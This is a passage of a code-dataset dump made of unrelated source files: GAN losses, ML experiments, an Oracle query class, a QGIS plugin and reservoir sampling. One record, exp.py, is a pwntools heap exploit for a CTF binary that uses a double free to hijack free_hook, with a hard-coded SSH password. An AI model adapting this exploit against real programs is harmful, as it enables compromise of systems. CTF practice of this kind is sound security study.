self.set_requires_grad([self.netDiscriminatorDecoderG_A,self.netDiscriminatorDecoderG_B], False)\n\n def d_logistic_loss(self,real_pred, fake_pred):\n real_loss = F.softplus(-real_pred)\n fake_loss = F.softplus(fake_pred)\n\n return real_loss.mean() + fake_loss.mean()\n\n\n def d_r1_loss(self,real_pred, real_img):\n grad_real, = torch.autograd.grad(\n outputs=real_pred.sum(), inputs=real_img#, create_graph=True,allow_unused=True\n )\n \n grad_penalty = grad_real.pow(2).view(grad_real.shape[0], -1).sum(1).mean()\n \n return grad_penalty\n\n\n def g_nonsaturating_loss(self,fake_pred):\n loss = F.softplus(-fake_pred).mean()\n return loss\n\n\n def g_path_regularize(self,fake_img, latents, mean_path_length, decay=0.01):\n noise = torch.randn_like(fake_img) / math.sqrt(\n fake_img.shape[2] * fake_img.shape[3]\n )\n #print(noise.shape)\n \n #print(fake_img.shape)\n noise.requires_grad=True\n #latents.requires_grad=True\n #print(latents.shape)\n #print((fake_img * noise).sum())\n #print(latents.grad)\n #print((fake_img * noise).sum().grad)\n grad, = torch.autograd.grad(\n outputs=(fake_img * noise).sum(), inputs=latents, create_graph=True#,allow_unused=True\n )\n #print(grad)\n path_lengths = torch.sqrt(grad.pow(2).sum(2).mean(1))\n\n path_mean = mean_path_length + decay * (path_lengths.mean() - mean_path_length)\n\n path_penalty = (path_lengths - path_mean).pow(2).mean()\n\n return path_penalty, path_mean.detach(), path_lengths\n\n def make_noise(self,batch, latent_dim, n_noise, device):\n \n if n_noise == 1:\n return torch.randn(batch, latent_dim, device=device)\n\n noises = torch.randn(n_noise, batch, latent_dim, device=device)#.unbind(0)\n\n #print('ok')\n\n return noises\n\n def mixing_noise(self,batch, latent_dim, prob, device):\n log_size = int(math.log(128, 2))\n n_latent = log_size * 2 - 2\n temp = random.random()\n #temp=0.95\n #print('temp',temp)\n #print(prob)\n temp_noise = self.make_noise(batch, latent_dim, 2, device)\n if prob > 0 and temp < prob:\n #print('ok')\n inject_index = random.randint(1, n_latent - 1)\n else:\n inject_index = n_latent\n #temp_noise = self.make_noise(batch, latent_dim, 1, device)\n #print(temp_noise.shape)\n #print(temp_noise[0].shape)\n latent = temp_noise[0].unsqueeze(1).repeat(1, inject_index, 1)\n latent2 = temp_noise[1].unsqueeze(1).repeat(1, n_latent - inject_index, 1)\n latent = torch.cat([latent, latent2], 1)\n latents = []\n #print(latent.shape)\n return latent\n\n def reduce_sum(self,tensor):\n if not dist.is_available():\n return tensor\n\n if not dist.is_initialized():\n return tensor\n\n tensor = tensor.clone()\n dist.all_reduce(tensor, op=dist.ReduceOp.SUM)\n\n return tensor\n\n def get_world_size(self):\n if not dist.is_available():\n return 1\n\n if not dist.is_initialized():\n return 1\n\n return dist.get_world_size()\n\n def gradient_penalty(self,images, output, weight = 10):\n batch_size = images.shape[0]\n gradients = torch.autograd.grad(outputs=output, inputs=images,\n grad_outputs=torch.ones(output.size()).cuda(),\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradients = gradients.view(batch_size, -1)\n return weight * ((gradients.norm(2, dim=1) - 1) ** 2).mean()\n","sub_path":"models/cycle_gan_semantic_mask_sty2_model.py","file_name":"cycle_gan_semantic_mask_sty2_model.py","file_ext":"py","file_size_in_byte":41955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"295336834","text":"import os\r\nimport numpy as np\r\nfrom sklearn.model_selection import 
RepeatedKFold\r\nfrom sklearn import preprocessing\r\nimport pandas as pd\r\nfrom src.LogisticModelTree import LMT\r\nfrom src.ASForest_LMT import ASForest_LMT\r\nTASK = 'clf'\r\nNum_of_Learners = 100\r\nN_JOBS = 50\r\nsave_folder = os.path.join(\"output4\")\r\nDATA = [\r\n \"Sonar\",\r\n \"Seeds\",\r\n \"Bankruptcy\",\r\n \"Column2\",\r\n \"Column3\",\r\n \"Musk1\",\r\n \"ClimateModel\",\r\n \"BreastCancerDiagnosis\",\r\n \"ILPD\",\r\n \"bloodDonation\",\r\n \"PimaIndiansDiabetes\",\r\n \"Vehicle\",\r\n \"Biodeg\",\r\n \"DiabeticRetinopathyDebrecen\",\r\n \"Banknote\",\r\n \"Steel\",\r\n \"WaveForm\",\r\n]\r\nif __name__ == \"__main__\":\r\n ##\r\n kf = RepeatedKFold(n_splits=2, n_repeats=5, random_state=0)\r\n ##\r\n for d in range(len(DATA)):\r\n data_name = DATA[d]\r\n data_path = os.path.join(\"data\", data_name + \".csv\")\r\n data = pd.read_csv(data_path)\r\n y = data['label'].values\r\n X = data.drop('label', axis=1).values\r\n print('load data:', data_name)\r\n print('X :', X.shape, '|label :', y.shape)\r\n _, y = np.unique(y, return_inverse=True)\r\n #\r\n ASForestLMT_RI_ACC = []\r\n ASForestLMT_RC_ACC = []\r\n Kfold = 0\r\n for train_index, test_index in kf.split(X):\r\n Kfold += 1\r\n print('Dataset: ', d + 1, 'Kfold: ', Kfold)\r\n # MinMaxScaler\r\n train_X, train_y = X[train_index], y[train_index]\r\n test_X, test_y = X[test_index], y[test_index]\r\n min_max_scaler = preprocessing.MinMaxScaler()\r\n train_X = min_max_scaler.fit_transform(train_X)\r\n test_X = min_max_scaler.transform(test_X)\r\n # LMT_RI\r\n clf = LMT(RC='F')\r\n ASForestLMT_RI = ASForest_LMT(clf, Num_of_Learners, n_jobs=N_JOBS)\r\n ASForestLMT_RI.fit(train_X, train_y, test_X, test_y)\r\n ASForestLMT_RI_ACC.append(ASForestLMT_RI.EnsembleACC[-1])\r\n # LMT_RT\r\n clf = LMT(RC='T')\r\n ASForestLMT_RC = ASForest_LMT(clf, Num_of_Learners, n_jobs=N_JOBS)\r\n ASForestLMT_RC.fit(train_X, train_y, test_X, test_y)\r\n ASForestLMT_RC_ACC.append(ASForestLMT_RC.EnsembleACC[-1])\r\n\r\n # Save\r\n Result = []\r\n Result.append(ASForestLMT_RI_ACC)\r\n Result.append(ASForestLMT_RC_ACC)\r\n Result = np.array(Result)\r\n save_path = save_folder + '/ACC_' + data_name\r\n np.save(save_path, Result)\r\n","sub_path":"Experiment_4_LMT.py","file_name":"Experiment_4_LMT.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"150303800","text":"import os\nimport re\nimport midi\nimport random\nimport librosa\nimport fnmatch\nimport threading\nimport numpy as np\nimport tensorflow as tf\nimport time\nfrom lc_audio_reader import find_files, load_files, randomize_files, clean_midi_files, trim_silence, AudioReader, MidiMapper\n\nTEST_DATA_DIR = \"/home/vijay/Desktop/Summer2k17/Research/LCWavenet/\"\nLC_FILEFORMAT = \"*.mid\"\n\ndef load_file_test():\n\t\t'''Expects two midi and two audio files named the same file name and checks if the load files works as expected.'''\n\n\t\t# Set ground truths\n\t\texpected_audio_len = []\n\t\texpected_filename = ['/home/vijay/Desktop/Summer2k17/Research/LCWavenet/notes_test_format0.wav',\n\t\t\t\t\t\t\t '/home/vijay/Desktop/Summer2k17/Research/LCWavenet/scale_test_format0.wav']\n\t\texpected_gc_id = [None, None]\n\t\texpected_lc_timeseries_len = [3347, ]\n\n\t\t# load_files yields a generator\n\t\titerator = load_files(TEST_DATA_DIR, 16000, False, True, LC_FILEFORMAT)\n\n\t\t# query generator and check all values\n\t\tindex_counter = 0\n\t\tfor audio, filename, gc_id, lc_timeseries in iterator:\n\n\t\t\t# 
Note: files are randomized, so we cannot check sequentially if they match or not\n\t\t\t# check audio length\n\t\t\taudio_len = len(audio)\n\t\t\tassert (audio_len in expected_audio_len), \"Length of audio file {} not expected.\".format(index_counter)\n\n\t\t\t# check file name\n\t\t\t# assert (filename in expected_filename), \"Filename {} of audio file {} not expected.\".format(filename, index_counter)\n\n\t\t\t# gc_id should be none, randomized or not\n\t\t\tassert (gc_id in expected_gc_id), \"Unexpected GC ID.\"\n\n\t\t\t# check midi output length\n\t\t\tlc_length = len(lc_timeseries[0])\n\t\t\tassert (lc_length in expected_lc_timeseries_len), \"Length of MIDI timeseries {} not expected.\".format(index_counter)\n\n\t\t\tindex_counter += 1\n\n\t\tprint(\"Load file test passed.\")\n\n\nclass AudioReaderTest(tf.test.TestCase):\n\n\tdef setUp(self):\n\t\tself.coord = tf.train.Coordinator()\n\t\tself.threads = None\n\n\tdef testReader(self):\n\n\t\twith self.test_session() as sess:\n\t\t\tself.reader = AudioReader(data_dir = TEST_DATA_DIR,\n\t\t\t\t\t\t\tcoord = self.coord,\n\t\t\t\t\t\t\treceptive_field = 5117, #as opposed to 5120\n\t\t\t\t\t\t\tlc_enabled = True,\n\t\t\t\t\t\t\tlc_channels = 128,\n\t\t\t\t\t\t\tlc_fileformat = LC_FILEFORMAT,\n\t\t\t\t\t\t\tsess = sess)\n\n\t\t\tdqd_audio = self.reader.dq_audio(1)\n\t\t\tprint(\"Here 1\")\n\t\t\tdqd_upsampled_midi = self.reader.dq_lc(1)\n\t\t\tprint(dqd_audio)\n\t\t\tprint(dqd_upsampled_midi)\n\t\t\tprint(\"Here 2\")\n\n\t\t\tself.threads = tf.train.start_queue_runners(sess = sess, coord = self.coord)\n\t\t\tprint(\"Here 3\")\n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\tprint(\"Here 4\")\n\t\t\tself.reader.start_threads()\n\t\t\tprint(\"Here 5\")\n\t\t\ttime.sleep(10)\n\n\t\t\tprint(\"TIME'S UP\")\n\n\t\t\tself.coord.request_stop()\n\t\t\tself.coord.join(self.threads)\n\n\nif __name__ == '__main__':\n\tload_file_test()\n\ttf.test.main()\n","sub_path":"wavenet/test_audio_reader.py","file_name":"test_audio_reader.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407684647","text":"import cx_Oracle\nimport datetime\nfrom Common import Common\nfrom Define import Define\n\nclass Database(object):\n\n\n def __init__(self, startDate, finishDate, reference, mode, iniReader, log):\n \"\"\"\n connect to the database and read and store the necessary data\n :param startDate: 'yyyyMMddHHmm'\n :param finishDate: 'yyyyMMddHHmm'\n :param reference: reference name\n :param mode: map scan mode(FD, ELA, LA)\n :param iniReader: object of ConfigParser\n :param log: object of logger Class\n \"\"\"\n self.logger = log\n self.logger.logger.info('start load database and save data')\n self.dateList = [] # list of the dates needed for the X axis of the time-series chart\n self.dataDic = {} # dictionary for storing quality-indicator data, value type : list\n self.common = Common(self.logger)\n self.define = Define()\n try:\n DB_cursor = self.connect_DB(iniReader.connectDB)\n self.divide_date(startDate, finishDate) # store the data used to set the date range of the database query\n self.add_dateList() # store the dates sequentially in dateList\n key_instance = self.get_query_dataDic_key(DB_cursor, iniReader.product)\n # key_instance is None when the table is missing (no data can be fetched), so this check lets us leave the Database object early\n if key_instance == None:\n self.valueCheck = False\n self.logger.logger.info('No Database Table')\n return\n self.generate_dataDic_key(key_instance)\n value_instance = self.get_query_dataDic_value(DB_cursor, iniReader.product, reference, mode)\n
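# --- Editor's aside (hedged illustration; not part of the original record) ---
# The query helpers below splice values into SQL text with % formatting.
# cx_Oracle also accepts bind variables for data values (table names still
# need string formatting), which avoids quoting bugs and SQL injection.
# A minimal sketch with hypothetical table/column names:
def _bound_query_sketch(cursor, table, mode):
    cursor.execute(
        'select average from %s where mode_id = :mode' % table,
        mode=mode)  # :mode is bound by the driver, never spliced into the SQL
    return cursor.fetchall()
# --- end aside ---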
self.valueCheck = self.add_dataDic_value(value_instance) # valueCheck is False when the table exists but no data matches the conditions, True otherwise\n if self.valueCheck == False:\n self.logger.logger.info('No Database Data')\n except cx_Oracle.DatabaseError:\n raise cx_Oracle.DatabaseError\n finally:\n self.logger.logger.info('finish load database and save data')\n\n def connect_DB(self, dbAddress):\n \"\"\"\n connect to the database\n :param dbAddress: database address\n :return: database cursor\n \"\"\"\n con = cx_Oracle.connect(dbAddress)\n return con.cursor()\n\n def divide_date(self, startDate, finishDate):\n \"\"\"\n generate dictionary and store the date and the previous date in dictionary format\n :param startDate: 'yyyyMMddHHmm'\n :param finishDate: 'yyyyMMddHHmm'\n :return: dictionary with previous date and date\n \"\"\"\n self.startYear, self.startMonth, self.startDay = self.common.split_date(startDate)\n self.finishYear, self.finishMonth, self.finishDay = self.common.split_date(finishDate)\n\n def add_dateList(self):\n \"\"\"\n add the date from the previous date to the date in the list\n \"\"\"\n # advance one day at a time up to the finish date, storing each date in dateList\n year, month, day = self.startYear, self.startMonth, self.startDay\n while True:\n if year == self.finishYear and month == self.finishMonth and day == self.finishDay:\n self.dateList.append(datetime.datetime(int(year), int(month), int(day), 0, 0))\n break\n self.dateList.append(datetime.datetime(int(year), int(month), int(day), 0, 0))\n year, month, day = self.common.get_day(year, month, day, 1)\n\n def get_query_dataDic_key(self, DB_cursor, product):\n \"\"\"\n fetch a query statement to get the key of dataDic\n :param DB_cursor: database cursor\n :param product: product name\n :return: database cursor with result\n \"\"\"\n # query used to extract the keys of dataDic\n try:\n DB_cursor.execute('select distinct quality_indicator from tb_%s_stat' %(product))\n return DB_cursor\n except cx_Oracle.DatabaseError:\n return None\n\n def get_query_dataDic_value(self, DB_cursor, product, reference, mode):\n \"\"\"\n fetch a query statement to get 5 column information\n :param DB_cursor: database cursor\n :param product: product name\n :param reference: reference name\n :param mode: map scan mode\n :return: database cursor with result\n \"\"\"\n # query used to extract the values of dataDic\n try:\n query = \"select quality_indicator, sampling_start, ref_product_id, mode_id, average from tb_%s_stat \" \\\n \"where sampling_start between to_timestamp('%s%s%s', 'YYYYMMDD') and to_timestamp('%s%s%s', 'YYYYMMDD')\"\\\n \"and ref_product_id LIKE '%%%s%%'\"\\\n \"and mode_id = '%s' \"\\\n \"order by sampling_start, quality_indicator\"\\\n % (product, self.startYear, self.startMonth, self.startDay, self.finishYear, self.finishMonth, self.finishDay,\n reference.upper(), mode)\n DB_cursor.execute(query)\n return DB_cursor\n except cx_Oracle.DatabaseError:\n return None\n\n def add_dataDic_value(self, value_instance):\n \"\"\"\n add value to the corresponding key in dataDic\n :param value_instance: database cursor with 5 column information\n :return: check variable whether data exists or not\n \"\"\"\n # store the fetched values under their matching keys\n # with three nested for loops, breakYN is used to break out of the second loop\n self.init_dataDic_value()\n breakYN = True\n dataCheck = False\n for instance in value_instance:\n for quality_indicator in self.dataDic.keys():\n if instance[self.define.QUALITY_INDICATOR] == quality_indicator:\n for i, date in enumerate(self.dateList):\n if instance[self.define.SAMPLING_START] == date:\n self.dataDic[quality_indicator][i] = 
instance[self.define.AVERAGE]\n breakYN = False\n dataCheck = True\n break\n if breakYN == False:\n break\n breakYN=True\n return dataCheck\n\n def generate_dataDic_key(self, key_instance):\n \"\"\"\n generate key in dataDic\n :param key_instance: database cursor with quality_indicator\n \"\"\"\n # create the dataDic keys (with empty value lists) from the fetched query\n for instance in key_instance:\n if instance[self.define.QUALITY_INDICATOR] in self.dataDic.keys():\n break\n else:\n self.dataDic[instance[self.define.QUALITY_INDICATOR]] = []\n\n def init_dataDic_value(self):\n \"\"\"\n init value of key in dataDic\n \"\"\"\n # initialize each key's value list with one entry per date\n for _, _ in enumerate(self.dateList):\n for quality_indicator in self.dataDic.keys():\n if 'NUM' in quality_indicator:\n self.dataDic[quality_indicator].append(0)\n else:\n self.dataDic[quality_indicator].append(None)\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"450051565","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n PSWESpeed.py\n ---------------------\n Date : May 2014\n Copyright : (C) 2014 by Riccardo Lemmi\n Email : riccardo at reflab dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Riccardo Lemmi'\n__date__ = 'May 2014'\n__copyright__ = '(C) 2014, Riccardo Lemmi'\n# This will get replaced with a git SHA1 when you do a git archive\n__revision__ = '$Format:%H$'\n\n\nfrom osgeo import gdal\nimport numpy\n\nimport utils\n\nfrom processing.core.GeoAlgorithm import GeoAlgorithm\nfrom processing.core.outputs import OutputRaster\n\nfrom processing.core.parameters import ParameterVector\nfrom processing.core.parameters import ParameterNumber\nfrom processing.core.parameters import ParameterExtent\n\n\nclass PSEWSpeedAlg:\n # Computation of the horizontal speed of PS East-West \n \n def __init__(\n self,\n asc_input_path, \n desc_input_path,\n extent,\n point_size,\n cd_e_asc,\n cd_h_asc,\n cd_e_desc,\n cd_h_desc,\n output_path):\n \n self.asc_input_path = asc_input_path\n self.desc_input_path = desc_input_path\n\n self.extent = extent\n self.point_size = point_size\n \n self.cd_e_asc = cd_e_asc\n self.cd_h_asc = cd_h_asc\n self.cd_e_desc = cd_e_desc\n self.cd_h_desc = cd_h_desc\n \n self.output_path = output_path\n\n def _save(self, array):\n # create the output image\n driver = gdal.GetDriverByName('GTiff')\n dst = driver.Create(\n self.output_path,\n self.cols, \n self.rows,\n 1, # number of bands\n gdal.GDT_Float32) # data type\n\n # set geotransform and projection\n new_ulx, new_uly, new_lrx, new_lry = self.extent\n dst.SetGeoTransform([new_ulx, self.point_size, 0, new_uly, 0, -self.point_size]) # GDAL expects 6 affine coefficients (skew terms and negative y resolution included)\n #dst.SetProjection( gdal.Open(\"/tmp/ascending_raster.tiff\").GetProjection() )\n #\n \n self.bandOut = dst.GetRasterBand(1)\n self.bandOut.SetNoDataValue(-3.4e+38)\n #bandOut.SetStatistics(\n # self.min,\n # self.max,\n # numpy.mean([self.max, self.min]),\n # self.std)\n \n self.bandOut.WriteArray(array)\n self.bandOut.FlushCache()\n\n def compute(self):\n #\n \n # 
Feature to Raster\n ras_asc_path = \"/tmp/ascending_raster.tiff\" # tmp file, Ras -> Raster\n utils.rasterize(self.asc_input_path, ras_asc_path, self.point_size) \n clipped_asc_array = utils.clip_from_extent_as_array(ras_asc_path, self.extent)\n \n ras_desc_path = \"/tmp/descending_raster.tiff\" # tmp file\n utils.rasterize(self.desc_input_path, ras_desc_path, self.point_size) \n clipped_desc_array = utils.clip_from_extent_as_array(ras_desc_path, self.extent)\n\n # Constant images\n self.rows, self.cols = clipped_asc_array.shape\n CosDir1_array = self.cd_e_desc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n CosDir2_array = self.cd_h_desc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n CosDir3_array = self.cd_e_asc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n CosDir4_array = self.cd_h_asc * numpy.ones((self.rows, self.cols), dtype=numpy.byte)\n\n # \"(([ResDisc] div [CosDir2]) - ([ResAsc] div ([CosDir4])) ) div (([CosDir1] div [CosDir2]) - ([CosDir3] div ([CosDir4])))\"\n num = ((clipped_desc_array / CosDir2_array) - (clipped_asc_array / CosDir4_array))\n den = ((CosDir1_array / CosDir2_array) - (CosDir3_array / CosDir4_array)) # for den == [0...] -> wrong image\n ew_speed_array = num / den\n \n self._save(ew_speed_array)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # set the geotransform and projection on the output\n #self.imageOut.SetGeoTransform(self.imageIn.GetGeoTransform())\n #self.imageOut.SetProjection(self.imageIn.GetProjection())\n\n ## build pyramids for the output\n #gdal.SetConfigOption('HFA_USE_RRD', 'YES')\n #self.imageOut.BuildOverviews(overviewlist=[2,4,8,16])\n # del dst???\n pass\n\n\nclass PSEWSpeedGeoAlg(GeoAlgorithm):\n \"\"\" was PS_VelEo.py \"\"\"\n \n ASC_INPUT = \"ASC_INPUT\" # Ascending -> SHP\n DESC_INPUT = \"DISC_INPUT\" # Descending -> SHP\n \n EXTENT = \"EXTENT\" \n POINT_SIZE = \"POINT_SIZE\" \n \n COSENO_DIRETTORE_E_ASCENDENTE = \"CD_E_ASC\"\n COSENO_DIRETTORE_H_ASCENDENTE = \"CD_H_ASC\"\n COSENO_DIRETTORE_E_DISCENDENTE = \"CD_E_DISC\" # Cosine Director East Descending\n COSENO_DIRETTORE_H_DISCENDENTE = \"CD_H_DISC\" # ... 
H?\n\n OUTPUT_PATH = \"OUTPUT_PATH\" # Raster\n \n def defineCharacteristics(self):\n self.name = \"Model to compute East-West horizontal component of speed for PS points\"\n self.group = \"[pstools]\"\n \n self.addParameter(ParameterVector(PSEWSpeedGeoAlg.ASC_INPUT, \n \"Ascending Vector\")) \n self.addParameter(ParameterVector(PSEWSpeedGeoAlg.DESC_INPUT, \n \"Descending Vector\")) \n \n self.addParameter(ParameterExtent(PSEWSpeedGeoAlg.EXTENT, \n \"Extent\")) \n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.POINT_SIZE, \n \"Point Size\", \n minValue=1,\n default=25))\n \n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_ASCENDENTE, \n \"Cosine Director East Ascending\",\n minValue=0.0, \n maxValue=1.0,\n default=0.6))\n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_ASCENDENTE, \n \"Cosine Director Horizontal Ascending\", \n minValue=0.0, \n maxValue=1.0,\n default=0.5))\n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_DISCENDENTE, \n \"Cosine Director East Descending\", \n minValue=0.0, \n maxValue=1.0,\n default=0.8))\n self.addParameter(ParameterNumber(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_DISCENDENTE,\n \"Cosine Director Horizontal Descending\",\n minValue=0.0, \n maxValue=1.0,\n default=0.5))\n \n\n self.addOutput(OutputRaster(PSEWSpeedGeoAlg.OUTPUT_PATH, \n \"East-West Speed Image\"))\n\n def processAlgorithm(self, progress):\n asc_input_path = str(self.getParameterValue(PSEWSpeedGeoAlg.ASC_INPUT))\n desc_input_path = str(self.getParameterValue(PSEWSpeedGeoAlg.DESC_INPUT))\n extent = utils.convert_parameter(self.getParameterValue(PSEWSpeedGeoAlg.EXTENT))\n point_size = self.getParameterValue(PSEWSpeedGeoAlg.POINT_SIZE)\n cd_e_asc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_ASCENDENTE)\n cd_h_asc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_ASCENDENTE)\n cd_e_desc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_E_DISCENDENTE)\n cd_h_desc = self.getParameterValue(PSEWSpeedGeoAlg.COSENO_DIRETTORE_H_DISCENDENTE)\n \n #...\n output_path = str(self.getOutputValue(PSEWSpeedGeoAlg.OUTPUT_PATH))\n \n with PSEWSpeedAlg(\n asc_input_path, \n desc_input_path,\n extent,\n point_size,\n cd_e_asc,\n cd_h_asc,\n cd_e_desc,\n cd_h_desc,\n output_path) as vel:\n vel.compute()\n","sub_path":"PSEWSpeed.py","file_name":"PSEWSpeed.py","file_ext":"py","file_size_in_byte":9120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248544486","text":"from pwn import *\n\n# conn = remote(\"pwn.buuoj.cn\",20173)\nssh_conn = ssh('root','localhost',2222,'waterdrop')\nconn = ssh_conn.process([\"/root/pwn\"])\ngdb.attach(conn,\"c\")\n\ne = ELF(\"./ciscn_2019_es_1\")\nlibc = ELF(\"../libc-2.23.so\")\n# context.log_level = \"debug\"\n\ndef add(size,name,call):\n conn.recvuntil(\"choice:\")\n conn.sendline('1')\n conn.recvuntil(\"Please input the size of compary's name\\n\")\n conn.sendline(str(size))\n conn.recvuntil(\"please input name:\\n\")\n conn.send(name)\n conn.recvuntil(\"please input compary call:\")\n conn.sendline(call)\n conn.recvuntil(\"Done!\")\n\ndef show(index):\n conn.recvuntil(\"choice:\")\n conn.sendline('2')\n conn.recvuntil(\"Please input the index:\\n\")\n conn.sendline(str(index))\n conn.recvuntil(\"name:\\n\")\n res = conn.recvuntil(\"\\nphone:\",drop=True)\n conn.recvuntil(\"Done!\\n\")\n return res\n\ndef call(index):\n conn.recvuntil(\"choice:\")\n conn.sendline('3')\n conn.recvuntil(\"Please input the index:\\n\")\n 
conn.sendline(str(index))\n conn.recvuntil(\"Done\")\n\nadd(0x98,'liwl23','13113113313')\nadd(0x18,'liwl23','13113113313')\ncall(0)\nheap_base = (u64(show(0)[:8].ljust(8,'\\x00'))>>12)<<12\nlibc.address = heap_base\nfree_hook = heap_base + 0x27a8\nsys_addr = libc.sym['system']\nadd(0x78,'A'*0x20+p64(0)+p64(0x51),'A')\nadd(0x48,'A'*0x20+p64(0)+p64(0x51),'A')\nadd(0x48,'A','A')\nadd(0x18,p64(0)+p64(0x21),'A')\ncall(3)\ncall(4)\ncall(3)\nadd(0x48,'\\x50','A')\nadd(0x48,p64(0)+p64(0x51),'A')\nadd(0x48,p64(free_hook-9),'A')\nadd(0x48,\"A\"*0x20+p64(0)+p64(0x21),'a')\n\nconn.interactive()","sub_path":"pwnable/ciscn_2019_es_1/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"366315859","text":"'''\r\nCreated on Aug 31, 2014\r\n\r\n@author: Mitesh\r\n'''\r\n\r\nimport random\r\n\r\n# input is the stream of data (of infinite or very large length), out of which we need to sample N elements\r\ndef reservoirSampling(input_data, N):\r\n sample = [None] * N\r\n\r\n for i in range(len(input_data)):\r\n if i < N:\r\n sample[i] = input_data[i]\r\n else:\r\n rand_prob = random.random()\r\n if rand_prob < N/float(i+1):\r\n replace_index = random.randint(0, N-1)\r\n sample[replace_index] = input_data[i]\r\n return sample \r\n \r\n\r\nif __name__ == '__main__':\r\n input_data = [5, 6, 2, 6, 1, 0 , 100, 10, 7, 9, 0]\r\n sampled_data = reservoirSampling(input_data=input_data, N=5)\r\n print(sampled_data)\r\n \r\n\r\n'''\r\nhttp://data-analytics-tools.blogspot.com/2009/09/reservoir-sampling-algorithm-in-perl.html\r\nhttp://en.wikipedia.org/wiki/Reservoir_sampling\r\n\r\nAlgorithms that perform calculations on evolving data streams, but in fixed memory, have increasing relevance in the Age of Big Data.\r\n\r\nThe reservoir sampling algorithm outputs a sample of N lines from a file of undetermined size. It does so in a single pass, using memory proportional to N.\r\n\r\nThese two features -- (i) a constant memory footprint and (ii) a capacity to operate on files of indeterminate size -- make it ideal for working with very large data sets common to event processing.\r\n\r\nWhile it has likely been multiply discovered and implemented, like many algorithms, it was codified by Knuth's The Art of Computer Programming.\r\n\r\nThe trick of this algorithm is to first fill up the sample buffer, and afterwards, to probabilistically replace it with additional lines of input.\r\n\r\n\r\n\r\n#!/usr/bin/python\r\nimport sys\r\nimport random\r\n \r\nif len(sys.argv) == 3:\r\n input = open(sys.argv[2],'r')\r\nelif len(sys.argv) == 2:\r\n input = sys.stdin;\r\nelse:\r\n sys.exit(\"Usage: python samplen.py N [file]\")\r\n \r\nN = int(sys.argv[1]);\r\nsample = [];\r\n \r\nfor i,line in enumerate(input):\r\n if i < N:\r\n sample.append(line)\r\n elif i >= N and random.random() < N/float(i+1):\r\n replace = random.randint(0,len(sample)-1)\r\n sample[replace] = line\r\n \r\nfor line in sample:\r\n sys.stdout.write(line)\r\n \r\n \r\nFor example, imagine we are to sample 5 lines randomly from a 6-line file. Call i the line number of the input, and N the size of sample desired. For the first 5 lines (where i <= N), our sample fills entirely. 
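(A compact way to see the invariant, added here as a side note rather than taken from the original post: suppose each line seen so far sits in the reservoir with probability N/i; line i+1 enters with probability N/(i+1), and a resident line survives the step with probability 1 - (N/(i+1))*(1/N) = i/(i+1), so its overall probability becomes (N/i)*(i/(i+1)) = N/(i+1) -- the invariant holds by induction.) 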
(For the non-Perl hackers: the current line number i is held by the variable $., just as the special variable $_ holds the current line value).\r\n\r\nIt's at successive lines of input that the probabilistic sampling starts: the 6th line has a 5/6th (N/i) chance of being sampled, and if chosen, it will replace one of the previously 5 chosen lines with a 1/5 chance: leaving them a (5/6 * 1/5) = 5/6 chance of being sampled. Thus all 6 lines have an equal chance of being sampled.\r\n\r\nIn general, as more lines are seen, the chance that any additional line is chosen for the sample falls; but the chance that any previously chosen line could be replaced grows. These two balance such that the probability for any given line of input to be sampled is identical.\r\n\r\nA more sophisticated variation of this algorithm is one that can take into consideration a weighted sampling. '''\r\n \r\n ","sub_path":"eclipse-workspace/interview/src/problems/ReservoirSampling.py","file_name":"ReservoirSampling.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257695195","text":"from sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import f1_score\nfrom matplotlib import pyplot\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport time\n\ndef log(n):\n\t#try:\n\treturn math.log(n+1e-5)\n\ndef calculate_aic(n, mse, num_params):\n\taic = n * log(mse) + 2 * num_params\n\treturn aic\n\ndef calculate_bic(n, mse, num_params):\n\tbic = n * log(mse) + num_params * log(n)\n\treturn bic\n\ndef logistic_all(trainX, testX, trainy, testy, path, n):\n\tos.system('mkdir '+path)\n\tns_probs = [0 for _ in range(testy.shape[0])]\n\tmodel = LogisticRegression(solver='lbfgs',max_iter=1e10, tol=1e-16)\n\tmodel.fit(trainX, trainy)\n\n\t# predict probabilities, tol=1\n\tlr_probs = model.predict_proba(testX)\n\t# keep probabilities for the positive outcome 